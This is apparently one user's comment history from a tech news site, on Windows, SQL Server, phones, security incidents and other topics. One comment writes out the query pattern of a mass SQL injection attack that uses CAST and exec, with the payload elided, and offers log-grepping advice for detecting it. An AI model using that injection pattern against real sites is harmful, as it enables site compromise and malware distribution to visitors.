81 posts • joined Thursday 8th March 2007 21:44 GMT
Re: To be fair ...
Always nice to read comments and articles from people who've clearly never seen the thing they're writing about!
"The problem is in the helper applications. Adobe's PDF Reader is a particular culprit. There is no way that viewing any kind of document should EVER allow any executable code to run without further explicit confirmation from the user. We are far too lenient about applications that allow remote execution exploits."
Except it's not an actual PDF attachment, it (at least with the variant I've seen in the wild) is an executable, with its icon set to be the standard PDF document icon and a file extension of .pdf.exe, so on machines with the default "hide extension of known file types" option enabled it looks like a pdf file. The example I saw even displayed as having come from another member of staff (a valid address) rather than some government agency.
Surprised there's been no mention in the articles about this of how it also attacks mapped drives, so it's not just the local system at risk. The client that got this had not just that users machine infected, but also every file that could be accessed via his mapped drives. Fortunately we had backups of the server data, but the client machine's data was less fortunate. Served as a valuable explanation of why we kept telling them to store their data on the server!
Not just Newquay
It's not just Newquay, I believe most places in Exeter don't accept them either any more. Certainly a few years ago when I had some young friends at the Uni they confirmed that some or all pubs wouldn't accept NUS cards or even PASS cards as proof of age, so many of them had to permanently go around with their passport when on a night out.
Does seem a crappy way of going about things but I guess it depends on whether he now goes into discussions with people about granting access. Much easier to start from a position of "I don't have to be here, I'm legally entitled to just deny access, now let's haggle." than one where the others may or may not have rights.
Re: Here we go again...
"It's aimed at RICH grown-ups. I don't know anyone who would spend that kind of money on a mobile and if I did, I'd have to say they were fucking lunatics."
Hardly, I'd say for what it does it's a bargain! Considering my last three phones were an XDA Exec, Nokia E90 and Nokia E7, all of which cost around the £600 unlocked, getting this for £475 when it's only just come out is hardly a wrench.
I've had mine for about a week now and absolutely love it. As someone who's always had a full physical keyboard that takes a little getting used to, but the soft keyboard is superb and it's improving as it learns how to write. The way everything fits together seamlessly is great, as is the granularity that you can choose which things alert at what time. Definitely the best phone I've ever owned and the biggest jump in improvements from one phone to another.
Re: Do not trust but don't dismiss either
So agree with you. I've had so many calls over the years from clients with email problems where it turns out the Internet connection is down. But they're users, they don't make that same mental connection.
The other thing I'd add to the list is honesty. Admit when you make mistakes, come clean on screwups, and users are more likely to trust you. Also when something really isn't your fault they're far more likely to believe you.
Completely agree. I'd add to that the sales guys who insist on speaking to you on the phone rather than just replying to an email. I can understand the whole "it's more customer friendly", but if I'm asking for specific information and I've already asked you to email then JUST EMAIL! I know my boss has ditched at least a couple of suppliers who figured it was better to interrupt him than simply email like he'd requested.
The other big thing for me is honesty, not in terms of those mentioned already, but simply the willingness to admit when you've done something wrong, or when you don't know the answer. We all make mistakes, and I'd much rather know about it quickly re-arrange timescales etc accordingly, than live in ignorance until a deadline has been missed.
Re: Flawed as usual
"A VM which only runs the latest MS OS and can't emulated H/W is freaking useless..."
Where does it say that's your only choice? If your client machine's running 2012 you can take advantage of the benefits of a generation 2 VM, if not then you continue like before with a normal VM that functions like it always has.
"If I was an enterprise admin, I'd probably want a proper hypervisor OS which is optimised to run and support VMs, without all the unnecessary cruft in a 'server' (glorified client) bloated carp kernel OS."
If you were an enterprise admin you'd probably already know that Hyper-V is a type 1 hypervisor, so it's already running on bare metal without the OS bloat. You can install the standalone Hyper-V Server to avoid having a management OS on the server, or install Server 2012 with Hyper-V, but either way the Hyper-V part is type 1. In the latter case the Windows OS is technically referred to as a management OS rather a host (since the other guest OS's sit on-top of Hyper-V NOT Windows Server).
Re: Licenses 'sold'.
What would be an interesting figure to find out is how many of those licences have had their downgrade rights enacted, so they're actually used to license a Windows 7 / Windows XP install.
While Win8 is far from perfect I don't think some peoples blinkered attitude to change helps, especially when it comes from those of us who should be able to handle it. Having got my head around the new ways of doing things I much prefer Win8, and found for most customers simply spending a little time to familiarise them with the new ways of navigating, shutting down etc removes most of the concerns they have with it.
Scarily agree with Google!
I can't believe I'm saying this, but I actually agree with Google on this one. If there's a legitimate reason under EU law to have information about you taken down then you should be making that demand on the website, not the search engine. Surely the point is to prevent people from accessing that information about you, in which case simply taking it off Google hasn't done that. If you can't justify taking it down from the website under EU law then how do justify taking it down from Google?
Once taken down from the website of course it's a different matter, and if Google don't then remove the entry from their listing, and more importantly their cache, then there's obviously a case to answer.
It feels like anyone taking this route is either being lazy, feeling it's easier to make the request from a large organisation like Google rather than a smaller website, or they know the request lacks merit under EU law and would be rejected by the smaller website owner.
Agree with Fred's comment about Google siting their being a US company though. It's a stupid argument, and you have to wonder how many people end up thinking "I agree with your premise, but you've pissed me off with that comment so now I'm against you".
"The most important thing for teaching is good teachers rather than good subject knowledge. A CompSci graduate is complete overkill for teaching computing to lower years."
I disagree, the most important things for a teacher other than the ability to teach are enjoyment and knowledge of the subject. If the teacher doesn't have a passion for what they teach then that will come across to the students and the lessons will be boring. Think of those great teachers you've had that engaged with the class and generated excitement about their subject, they're the ones encourage students to learn. I can't imagine an arts grad who decides to do this for the extra beer tokens being nearly as good as a computer geek who wants to pass their knowledge on.
A CompSci graduate may well be overkill for many students, but the same could be said for science teachers with degree's in their chosen subject. When a gifted student gets ahead of the class and asks tricky questions attempting to push themselves, that's when that additional knowledge comes in and becomes important.
Re: You count engineer as a scientist?
There are plenty of proper engineers who'd scoff at you calling yourself an engineer. In any other profession it takes more than just going to Uni for 4 years to call yourself an engineer, you have to be properly accredited as well. It's only within IT that we get to blindly call ourselves engineers, and I believe the other professions hate us for it since it devalues the work they do.
IIRC while they might just be doing screwdriver jobs in your house, proper BT engineers have to do a LOT of training to get that title, and are arguably more entitled to use the name than a programmer.
Hell, I've spent 12 years actually working in and with computers, but just coding on them, and I still feel somewhat uncomfortable about being referred to as an IT "Engineer", though most people can at least understand that term compared to something like Sys Admin.
Re: This depends where you are
There's definitely no excuse for not locking out a member of staff when they're fired, hell in the past I've been asked to disable / remove someone's access (but not discuss it with anyone else) while said someone's been in the meeting being fired.
When it comes to notice periods for people in sensitive positions (for instance Sys Admins where they need elevated access just to do their jobs), a common method I've seen is garden leave, where the person is paid as normal during their notice period, is excluded from actually working at the company (since they no longer have access), but is required to be available if required during that time in case they need information / help etc since they are still technically employed during that time.
Re: Trevor Pott
I think he makes many valid points but they're only one side of the issue. I agree that as techies we can be a little too eager to opt for the solution that gives us more toys to play with, and to lose sight of the business side of the equation. Building the best all singing all dancing solution that incorporates every element of failover, expansion and redundancy from a MS whitepaper might sound great, but spending £50k+ on a solution that might save the company £1k per year just isn't worth it. And while we might try to deny it, us techies are just as keen to build our own little empires as any other part of the business.
But on the flip side, guys like this and others in management need to treat IT as a key element in finding the appropriate solution, not simply the implementers of whatever management decide is the best way to go based on little or no actual knowledge. Sometimes management may have the right answer, but if they don't include IT in the decision they'll never know if there might have been a better, cheaper and quicker solution available that they weren't aware of.
In my experience almost all solutions that have come from IT controlling the direction are anything but random, it's where management change their minds, update the spec mid project, and fail to give an overview of the long term direction being taken that the approach becomes random, as IT has to scramble to pry different systems alongside each other.
Too often I think management take the view of "oh, they don't need to know those details", and are then annoyed when the solution presented doesn't meet all the requirements that have existed purely in the managers own head. If there are specific constraints, objectives and long term plans then we NEED to know about them.
Any task can be broken down into Why, What and How. Why and What are down to management to decide, and they NEED to tell us the What with which we decide on the How. IT don't need to know the Why as long as the What includes those constraints and considerations that will make a difference to How. Management can make suggestions for How, but at the end of the day, that's what we're paid for!
Different tools for different situations
Completely agree with you. I regularly use both method, with the choice depending purely on which is more suitable and convenient for a given situation. If I want to do the same exact task lots of times then being able to script and automate it is fantastic, but for those simple tasks I do once in a blue moon I'd never remember the specific command, but a GUI is easy to remember.
I loved it with SQL 2005 when they introduced the option to generate the script for what you'd just setup in the GUI. It might not have been the most efficient code, but for something I want to run at night once a week / month I don't care, it's not worth spending hours working out how to script it manually. On the other hand, I hated how MS decided with Exchange 2007 that lots of functions (including some simple day to day ones) should be done exclusively via PowerShell! Why? Allow me to do everything via either interface (allowing for some specific, unusual, high level options you couldn't fit into the GUI) and let me decide which one suits my current task.
GUI wizards may be simplistic at times, but they do make delegation of simple tasks to junior staff much easier. I can show a junior how to run through the wizard and be confident of them not screwing anything up, at the command line I wouldn't feel as secure. But having the command line option means I can use that method when something more complex comes along that the GUI can't handle.
Re: Remote Control
Surprised no one's mentioned PowerShell, which certainly since v2 has included the ability to remotely administer systems!
Re: What A Load Of Girlie Bull-....
@Mad Mike. I definitely agree with the first paragraph! I think part of the issue tends to be that people forget that "IT" is a VERY large subject containing a lot of very different disciplines, each of which tends to lend itself to certain types of people.
I remember reading some research years ago that mentioned how typical personality traits of programmers for instance don't tend to match those of many women, but the more cautious, careful and planned approach required of good DBA's and Sysadmins is a far better match. In fact if you simply look on the Technet forums you'll notice that in the DBA and Sysadmin arenas there are quite a few very skilled and knowledgeable women working in those fields.
The problem in my opinion (and this also applies to getting guys into IT) is that IT education is still very much geared towards the belief that IT = programming. Most courses (school/college/uni) focus on teaching programming languages with some coverage on other areas, so the only people likely to attend them are 1) those who want to be programmers, and 2) those who're into computing enough to put up with a few years of learning things they don't care about to get a piece of paper and get a job in the area they're actually interested in.
If they specifically want more women in IT they need to focus on those disciplines that women actually want to do and have a passion for, show girls that those career paths are available and how to get into them, and stop treating the entire IT world as if it's a single career path.
Re: I don't want to work harder.
Personally I've very glad I rarely end up doing desktop support these days, since I'm mainly server orientated, but I feel really sorry for the poor buggers who'll have to support this! Effectively we now have two completely different Windows UI's to learn, since some users will be using Metro entirely, while others will be breaking out (well as much as is possible) to the proper Windows desktop, and we'll need to be able to cater for both groups!
I can't help thinking Kevin Turner's never actually MET a real life user. They're going to hate it, it's going to confuse the hell out of them just when they've finally got used to things like the start bar. Geeks might put up with it, learn to use it etc, users won't. They'll moan, complain, and refuse to use it, and that will give IT Support even more of a headacre.
At least with 7 they had the geeks on side, liking the new features and willing to pass on the new benefits to their users, with this, not so much. When asked by users why they need the new version, there'll be less "let me show you the features that will make things easier for you", and more "I dunno, I think it's shit as well but we've been told to upgrade you".
I'm really disappointed by 8, which is a shame since with the new virtualisation tech built into it I was really looking forward to it coming out. Now... not so much.
Re: Education does not equate to Knowledge
Part of the problem to my mind is that this seems to be seen as an either or option. Personally I'd prefer not to see either side making policy without the input of the other side. At the end of the day it's governments job to set policy, BUT they should always at least consult those in the know before doing so. There's simply no excuse for setting a policy that fails when the relevant people could have predicted it if they'd simply been asked, but there are occasions where other issues might outweigh the science.
For me I think the key would be having greater transparency in the whole process. Ministers should be able to choose which advice they heed and which they ignore, but where they choose to ignore it they should have good overriding reason for doing so, and that reasoning should be documented publically. If they know that their decision to ignore scientific advice and their reasons behind it are documented and able to be made public, it might help focus their minds to ensure they really do have good reason to decide one way or the other, and aren't simply trying to appease the Daily Mail reading voters.
I agree, I think the biggest issue, and unfortunately it's where the majority of the general public encounter science debate, is on those TV programs which feel a need for a balanced opinion on topics where there is little dissent from the mainstream scientific community. You end up with Prof Jo Bloggs who's worked exclusively in the field for the last 30/40 years having to justify his findings against the views of some random oik they pulled off the street. You end up in a situation where if random oik is better at communicating / hyping up his/her own views then they end up trumping the far more qualified expert, regardless of the validity of their argument. And unfortunately as we're well aware, for many boffins and geeks public speaking in simple language isn't something that comes naturally (major generalisation I know).
If they can't find someone of at least reasonably similar standing in that field to argue against the prof then they should either not bother aiming for balance, or be far more careful how they tread.
don't think that's quite right
Close but no. Time broke because she failed to kill the Teselecta with the Doctor inside, she just didn't know that it wasn’t the Doctor standing in front of her. That was the true fixed point in time, not the actual Doctors death, but obviously no one else knew that. Therefore her kissing the Teselecta at the end restored time to normal. I agree with the rest of it being a bit muddled though. I have to assume Ian Harrison didn't bother actually watching (or paying attention to) the end of the episode.
Yes Hibernation has been around for a long time, but the problem these days is that as powerful computers get more and more memory in them that means more and more data that needs dumping to disk every time. Hiberating an 8GB computer takes quite a long time.
OK, so this isn't revolutionary, but to my mind it is smart evolution. If you can't fix all the problems in one hit, at least fix some of the little things that you can control.
Yeah they changed all that years ago. From memory I believe registrar's are no longer allowed to withhold making changes to a domain for any reason. In any case if you do have issues getting a domain transferred to another registrar you can simply go direct to Nominet, pay them £10 (again going from memory) and they'll do it direct without involving the troublesome registrar.
One size doesn't fit all
When I first read this my first thought was that Mozilla were shooting themselves in the foot, but the more I think about it the more I've come to the conclusion that it's not such a bit deal. The key is that one size rarely fits all successfully.
In a corporate environment the key requirements are stability and reliability. You want to know that everything will just work, wizzy new features are all well and good, but since the development / testing cycles take so long it's unlikely any internal apps etc will need the latest and greatest features in the short term. An admin wants control over what users are doing and how they do it, and the certainty that things will work as expected, so they don't end up with those on high yelling at them because something hasn’t behaved as expected. I agree with the comments about "apps should be standards compliant and just work", but in the real world that simply can't be relied upon. Telling the MD that staff can't do their work because the developer didn't follow the correct standards and it's not your fault won't wash.
In a home environment on the other hand most people are more tolerant of stability issues (I know I certainly am), but they want to be able to use the latest and greatest apps etc. Facebook games, streaming videos etc are important at home, not in the work place, so rapid deployment of the latest features is important to them. The raft of add-ons available in Firefox can be great for a home user, but again is a pain for an IT admin.
So, while I wonder if Mozilla are being short sighted in ignoring Enterprise environments, if their aim is to target a specific niche (eg home users) then in that respect this is probably the best way to do it, since MS clearly aren't aiming their efforts in that direction.
A little knowledge can be a dangerous thing
Many years ago whilst at Uni I was the main sysadmin for the SU's computing society (TermiSoc for those in the know), which had three linux servers of our very own, stored in one of the Uni building's basement.
There were a few other guys who also had root access, one of whom was very interested in security and spent a lot of time attempting to hack into and then improve our systems.
Now this guy had been reading about the risks of files being owned by root and having execute permission within user accessible folders. He started searching through the filesystem, and discovered that within each users folder there was a . and .. folder with the permissions he'd been looking out for. Now while the exact details are a little fuzzy (it was at least 12 years ago) I know our ever diligent security geek decided to fix this issue. He proceeded to change the permissions on both folders to prevent executing by normal users.
Shortly afterwards he started hearing people in the lab comment that they could no longer login. Of course removing that permission prevents a user from traversing back through the folder structure, and the login process is unable to traverse to the home directory and /etc directories. The only user able to login was root, but we'd already restricted that so remote connections were only allowed by normal users, who could then su to root, so we had no remote access what so ever.
Myself and another sysadmin friend, with resident security geek in tow, had to get someone to let us into the basement so we could get console access to the machine and fix the glitch. A fun day, but I think everyone learnt a valuable lesson, and of course the story continues to be recounted occasionally to this day!
I think you overestimate normal users
While that might be true for techies, I don't think it is for normal users. As far as they are concerned, they have a computer and it runs Windows. If there is a problem then it's Windows that has crashed, Windows that has lost their work, Windows that is performing slowly. They don't know or care about the rest of it, and most don't even realise that there are differences in quality and performance between seemingly identical components. If a user buys a crappy PC made from really cheap components, they won't blame the computers hardware when things go wrong, they'll blame Windows, and for that reason I completely understand why MS a going down this path.
Now what they haven't said (at least in this article) is if retail / upgrade copies of Windows 8 will no longer be available. As long as they are then I don't see an issue. Techies wanting to build their own spec computer still can, and will have the knowledge to know that issues could be either hardware or software. Normal users buying branded computers will be assured that the computer they buy is properly built and designed to run that version (rather than it simply being shoe horned on like many previous versions have been on old kit), and it will hopefully then be more stable. Of course it might not work, but either way, whether it's a hardware or software problem a user experiences they will blame Windows by default, so MS have little to lose in trying to reduce the number of hardware issues tainting their reputation.
What about how people ACTUALLY read?
Completely agree, he also seems to miss the fact that many people use PDF's as a way to send an electronic document in a fixed form, eg a quote, invoice, contract etc, so you can be reasonably sure that it hasn't been altered (yes I know there are ways to do it, but most users wouldn't know them). In terms of portrait / landscape I can kind of see where he's coming from, however I think he's missing how people actually read. A column of text is far easier to read and scan through, than a wide long line of text, that's why after all many documents in A4 portrait have two columns.
Yeah that's what I thought
There may have been more recent updates, but a quick search shows that back in March 2010 the EU demanded that Google delete the unblurred images after 6 months. At the time Google said their policy was to delete them after 12 months. Either way, if this happened (and was photographed) in June 2009, the unblurred pics should have been long gone by November 2010 when this was apparently first raised with Google.
So my guess would be that either a) Google are taking the piss, knowing full well they don't have them any more, or b) if it's possible to recover the data from backups, they want a proper court order (which possibly then allows them to recover the costs), before they make any efforts to recover the image from backup since it's unlikely to be a quick and easy job considering the mass of data they have.
Understanding of Named Instances
"Named instances provide complete database isolation while allowing consolidation onto the same server. But it is a bitch for back-ups. Each instance must be maintained separately from the other instances on that server"
Have you missed the point named instances entirely? Of course you have to maintain them separately, that's the whole point! Each instance isn't just a isolated session of a single installation of SQL, it's a completely separate installation of SQL. You could have multiple identical instances, or you could have each of them running with a different version, 7, 2000, 2005, 2008, or even different service packs. Server\Instance1 and Server\Instance2 are in no way shape or form connected to one another, other than they both reside on the same server, and as such have to be treated, backed up and patched accordingly.
I'd be concerned about anyone happy to just role out a patch / service pack to multiple instances at the same time in a production environment, rather than properly installing and testing them individually.
Not sure I follow your logic here. Signing DNS and SSL certificates are two completely different things, and serve completely different purposes.
DNSSEC confirms that the IP address returned when you make a DNS request is the correct one.
SSL confirms that the website you reach is the real one, eg the https:\\secure.foo.com you see really does belong to Foo Corporation, and not Mr B H Hacker who's setup the site on his server and tricked your computer to go to him instead of the real one. It provides authenticity by ensuring that if you want to purchase an SSL certificate for Foo Ltd, you can prove that you really are Foo Ltd (there's quite a few checks done, especially if you're a Ltd or PLC company, hense their justification for the high prices). And finally, and perhaps most importantly, it allows you and the server your connecting to to establish a secure tunnel down which all the communications are sent, thus protecting you from anyone sniffing your connection.
What SSL doesn't do is care about what IP address the site is on. As long as you have the certificate information you can install it on any server at any address. So the two don't cross over at all, to my mind they compliment each other, improving the overall security for viewing normal websites, and improving yet futher the security of secure websites.
Re: Daniel Bennett & Pierre (and a couple of others)
Thanks guys, I was beginning to lose hope of intelligence anywhere in this thread!
Completely agree with the points made about the documents not being editable, however everyone seems to have missed another major reason for not allowing word docs.
When transferring a word document from one machine to another you cannot be certain how it will render. Depending on how the original machine is configured, how the viewing machine is configured, which fonts are loaded on each, the default paper sizes, borders etc, will make a difference on how the document looks on the viewing machine. Assuming at least some of the marks for this work are for presentation, how can the examiner be certain that what they are seeing on their screen is what the student intended to present? If the student creates a document which is well laid out and presented, but it doesn't render properly on the examiners machine, should that student be marked down for it?
One of the main benefits of PDF (other than the difficulty of altering it), is that the way it always renders the same on all machines, so you can be certain that if it looks correct on your machine when you create it, it will still look the same when it is marked.
So where is it?
OK, am I missing something here? Where is the actual consultation? The NDS page doesn't show a link, and neither does the DfT page. Of course I'm assuming there is more to it than what's listed on those two pages, and some way to actually submit feedback on-line rather than having to resort to... *shudder* hard copy!
E90 competitor that doesn't compete
I would think the only people who'd want this are those who want an E90 on the cheap! It looks like they've taken the basic form factor, and then removed all the good points from it.
Smaller screen and lower res as already mentioned aside, having the phone only able to open to an angle is going to be annoying for anyone wanting to use when it is in their hands rather than on a desk, and seems like they've gone back to the old communicator style! One of the best things with the E90 is being able to use it at an angle on a desk, but also to open it completely when in your hands which makes it so much easier to see the screening while typing.
This is a phone without a market. At the top end people will pay the extra for the quality of an actual E90, and at the low end, there are better, cheaper and more functional smart phones already out there which do the same things better.
Multiple fixes in one update!
Sorry but WTF! You have a vulnerability which is being actively being exploited, so you issue a patch which fixes not only that but four other issues as well!
Why? As a windows admin that would give me serious concern! Taking the DNS patches on their own, I can assess the risk of being attacked against the risk of something breaking, but add in additional patches and you increase the chances of something breaking, which only encourages admins to do more testing, rather than getting a critical fix roled out asap.
This should have been issued on it's own, with perhaps the other updates issued as a separate update... or do Mac's not have a decent Windows Updates / WSUS / SMS capability to help manage this properly?
"So just how are the software distribution (well the team they pass it off on to anyway) team actually meant to push patches out to the desktops?
considering S.W.D cant do it between 7am and 7pm due to stupid rules already put in place by them?"
Well any half clueful server admin would already have this kind of thing centralised and automated. Ever heard of WSUS, SUS & BITS? Updates can downloaded to the PC during working hours without causing disruption (thanks to BITS), and then if the office shuts at 19:00 you can either set all machines to shutdown at say 19:30, while telling your windowsupdate GPO to install updates and then shutdown at 19:00 (so they either shutdown as a result of an update, or where non are required it roles over the timed shutdown).
Any users complaining that they're "in the middle of something" can simply hibernate their machines at the end of the day before they are forcably shut down to maintain the previous days state.
"On the contrary, at least here in the England & Wales, barristers are not allowed to knowingly mislead a court"
That's right. A friend of mine who is a barrister explained it to me when I asked him the difference between him an a solicitor when it comes to trials. Essentially a I understand it, if you're taken to court you get yourself a solicitor and can tell them everything, including that you are guilty. Now I'm not certain about where the split goes, but a lot of the evidence gathering is done by the solicitor who obviously knows the truth, and this is then passed to your barrister to build a case for your defense, with them always assuming your innocense. This way the solicitor can make sure (while knowing your possible guilt) that they have covered the angles which may come up in the trial against you, without the barrister knowingly lying to the judge/jury.
Wow, it's impressive to see how many people clearly have no idea how or what SQL injection is or how it works!
As anyone who has read up on the methods used recently to do these attacks can confirm, the method used involving cast() mean that the web server has no way to know what the data is trying to. Unless your app checks the data being passed through it, and rejects anything that falls outside of the expected norm, it will simply pass the data to SQL for it to work out.
The basic query format tends to be /foo.asp?bar=1;declare @s varchar(4000);set @s=CAST(0x1234..<loads more hex>..6789 as varchar(4000));exec(@s);--
though obviously with the spaces escaped out with %20's. In the version I've seen a lot of recently, that code if it manages to get to SQL Server will get it to run through every single varchar field in the current database, and append a html link to a malicious jscript file into each record. That's because the cast statement (which is run by SQL not the web server) converts the innocent looking string of hex into ascii, at which point it turns out to be a lovely malicious block of T-SQL code.
For anyone wondering if they are being probed, I'd definitely recommend grepping your web server logs for '=CAST(' without the quotes and seeing what you can find.
splitting the wealth
All those who have commented that they hope it'll be awarded to EDS seem to have missed :
"The five will then 'compete in a series of mini-competitions to win specific contracts for the various projects.' "
So the entire project is being carved up and in theory all 5 could end up working on it.
Now considering the previous record with this kind of thing, does anyone REALLY believe it'll be a genuine contest? Maybe I'm paranoid but I have visions of someone from each of the five companies meeting for a coffee to decide how to split it up between them, therefore minimising the amount of profit they'd need to shave off the quote to get the work... but of course that could never happen now could it!
Well Mr MacKellar certainly isn't shy about trying to tar everyone else with the same brush now is he!
"Christians believe"... "Christians accept"... "This is a crucial Christian belief"
Really! I don't ever remember anyone asking my opinion, and I imagine there are plenty of other Christians out there who feel the same as me.
Mr MacKellar, unless you can provide documentary proof showing the majority of Christians agree with you, please don't try dragging the rest of us down into this!
My biggest worry with the radar system is if it properly detects motorcycles as well as cars. If it doesn't detect people, then is it likely to detect a bike which is a similar width when seen front on. I've had enough problems in the past with the detection strips in the road not detecting my bike (an R6 so not exactly small), that I imagine the radar not spotting me either.
It's bad enough with many car drivers not thinking about their blind spots to consider if there is a bike there, but with this system they're more likely to assume that there's nothing in their blind spot because the system says so, and go ahead and pull out regardless.
That said, personally when passing cars on the motorway etc I always work on the assumption that the drive won't check their blind spot anyway, which limits the danger this system poses!
Getting old sites to work in IE
Surely that's simple enough, MS just need to add a function into IE to allow the user to specify a different user agent, and set it to Opera / Firefox! Then any IE specific code in a webpage won't be run, and history will come full circle! :-)
@Hans, Ian and Solomon
@ Hans Mustermann
Try reading the actual article! It doesn't say that WoW users are the ones who are having their credit card details stolen, it's saying that stolen credit cards (from anywhere) are being used to pay for WoW subscriptions.
"So what do Halifax do? They stop stolen card payments to Blizzard. What would any sensible company do?
GET BLIZZARD TO REPORT THE FUCKING FRAUDULENT TRANSACTIONS AND THE IP ADDRESS TO THE POLICE SO THEY CAN FUCKING SUBPOENA THE ISP FOR THE PHYSICAL ADDRESS ASSIGNED TO THAT IP WHEN THE CREDIT CARD THEIF CONNECTS TO THE SODDING GAME!"
OK, lets have a reality check shall we? 1) Halifax have direct control over which transactions are and are not paid out. 2) Halifax do NOT have control of Blizzard's servers, so rely on contacting them in each case to get the information that's required. 3) Hiding your IP address is relatively simple these days, so getting the IP address that the fraudster connects from doesn't ensure they can track it to the actual criminal. 4) Every one of these fraudulent transactions gets paid for by Halifax, since the end user claims it back. 5) I dread to think how much money it would cost them in man power and legal fees to track down and presecute every single fraudster individually.
"If the bank has seen fit to issue me with a card, then they should leave me and my purchases alone. I review my statement each month and if something is wrong I can invoke my buyer protection privileges and the charge will be refunded."
So what you're basically saying is that you want to have your cake and eat it!?! You don't want the bank to stop transactions they feel are dodgy when they are made, yet you expect them to pick up the tab and clear the charge from your card when you find out that they were fraudulent?
I'm certainly not a big fan of many banks, but in this case I have to agree with their actions.
Couldn't agree more. The first thing that went through my head on reading this was that at least it's given them a chance to properly test their procedures, in a way that I doubt they could realistically arrange to do otherwise (at least properly) due to the immense cost involved.
The question now is of course if those in control take the opportunity to learn from this and make adjustments to their procedures, rather than just focus on pointing figures and passing blame.
Bank fraud prevention department
While certain terrible, I can't help but thinking that the actions of some banks fraud prevention departments beats it hands down.
Don't know if it's all banks, but certainly if you're an HSBC client and they detect what they think is a fraudulent transaction on your credit card you get a phone call. Wonderful, except that firstly they withhold their phone number so you can't use caller ID to confirm who's calling, and secondly before they'll go into any details they expect you to provide your security information to confirm who you are! I mean really, you phoned me, you know who I am but who the hell are you? Amusingly if you mention this to them it seems to go right over their heads! Someone I know refused to give out his info until they proved who they were, suggesting that they confirm the value of the last transaction he'd made. They refused so he declined to speak to them further.
Re: Here We Go Again...
"It really is about time that web-hosting organisations got their acts together and took the security of their clients seriously."
While I certainly agree that many organisations need to look a lot more seriously at how they control the security of their equipment and websites, I think it's somewhat heavy handed to just assume that the fault here was with the sites web hosting company.
From the limited information given about what happened here it sounds very similar to a large number of hacks which were done at the end of last year covering thousands of different web sites, pointing visitors towards malicious .js pages to install malware on their machines. In that case it was actually a SQL injection attack that caused the problem, and I wouldn't be suprised if the same was true here.
Now since in many cases (I'd even hazard to say most) the company that hosts the webserver is not the same as the one who designs and develops the website, perhaps you should be directing your annoyance at the developers who are not preventing the SQL injection, rather than the poor hosting guys who have no control over the website code running on their servers.
Honesty for once
"Bell says: "If two things happen at the same time, it doesn't mean one caused the other.""
While I'm sure most of us here already knew it, it's a nice change to see a scientist making this point for once, rather than sticking with the usual line that their conclusion must be fact.
But what about the hacking?
So the article starts off by saying that some people were trying to cheat by hacking the game, and then goes on to tell us about the game itself, but what about the hack itself! What did they do, did it work?
Dammit, you caught my interest then let me down by not providing the info I was expecting! Shame on you reg!
Helmet visors & map reading
Look forward to the day when I get something like this fitted in my helmet displaying on the visor!
Personally, yes I'm perfectly able to read a map, but in reality that doens't always help with some routes. It's fine when you're going somewhere near to a major junction, but when you're going somewhere in the middle a large city it becomes a problem. There's no way I can memorise that many turns, junctions and roundabouts accurately, and of course map reading on a bike, even when stationary is fiddly due to gloves and the map being in a bag! I tend to have a single headphone in my ear under my helmet, connected to my GPS enabled phone in my pocket so I can hear the directions as I ride, but it's far from ideal.
@Ken Hagan: @AC: @Daniel
I think you're missing the point. It's not that the malware author would get you to run both executables. The author produces both files, and then submits the clean file to the AV companies for them to check and add to their whitelist. Then if you get the bad file on your machine your AV software won't pick it up since it will register it as being the good one.
I remember this happening a while ago as well when they lost all comms to one of their DC's, thus taking out their entire DNS infrastructure.
What amazed me then, and still amazes me now is why they haven't bothered to locate their servers in different physical locations, and on different IP networks. For many small companies I could understand it, but come on, 123-reg is owned by Pipex, and they in turn own several other ISP's, who collectively must surely have more than one datacentre to hold their servers. Why the hell hasn't someone there split their core infrastructure servers across these sites to give them all some redundancy, especially following the first time that had problems like this (that I'm aware of) a couple of years ago.
- World's OLDEST human DNA found in leg bone – but that's not the only boning going on...
- Lightning strikes USB bosses: Next-gen jacks will be REVERSIBLE
- Pics Brit inventors' GRAVITY POWERED LIGHT ships out after just 1 year
- Microsoft teams up with Feds, Interpol in ZeroAccess botnet zombie hunt
- Storagebod Oh no, RBS has gone titsup again... but is it JUST BAD LUCK?